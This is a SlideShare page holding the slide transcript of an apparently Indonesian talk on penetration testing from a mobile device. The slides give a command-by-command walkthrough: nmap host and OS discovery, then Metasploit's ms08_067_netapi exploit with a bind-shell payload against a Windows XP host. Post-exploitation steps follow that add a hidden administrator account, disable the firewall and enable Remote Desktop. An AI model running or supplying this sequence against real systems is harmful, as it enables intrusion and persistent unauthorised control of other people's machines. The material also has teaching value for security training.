Your SlideShare is downloading. ×
Fit 13 penetration test 1
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Saving this for later?

Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime - even offline.

Text the download link to your phone

Standard text messaging rates apply

Fit 13 penetration test 1

365
views

Published on


0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
365
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
10
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. {network security part 1} Penetration test sederhana dengan mobile device... http://www.flickr.com/photos/32615508@N02/3047982712
  • 2. {network scan} Host discovery, find the targets
  • 3. StumblerPlus , iWep PRO
  • 4. iNet , Snap: Mobile version of pinger/scanner (ex: Angry IP Scanner)
  • 5. {deeper profiling} Port scanning, OS detection etc.
  • 6. Nmap 5.00 Jailbroken iPhone etc. $> nmap -O 192.168.5.44 Aha, microsoft-ds (port 445) plus XP SP2...
  • 7. Or else... $> nmap -p 445 192.168.5.0/24
  • 8. {penetrations} Using exploits etc.
  • 9. Metasploit Framework $> msfconsole Easy, many modules, reular updates, Ruby, can run nmap too.
  • 10. Use Proper Modules $> use windows/smb/ms08_067_netapi $> show options $> show payloads Security knowledge & deduction
  • 11. Set Options $> set payload windows/shell_bind_tcp $> set rhost 192.168.5.44 $> exploit
  • 12. Welcome to C: Prompt $> ipconfig $> dir $> net user $> net user guestboss guestboss /add $> net localgroup Administrators /add guestboss $> echo “P4wned!” > "c:Documents and SettingsguestbossDesktopHello.txt"
  • 13. Shutdown Firewalll & Enable RDP $> set opmode mode = DISABLE exceptions = ENABLE $> reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f $> net localgroup "Remote Desktop Users" /add guestboss
  • 14. {conclusions?} ..............................
  • 15. Q&A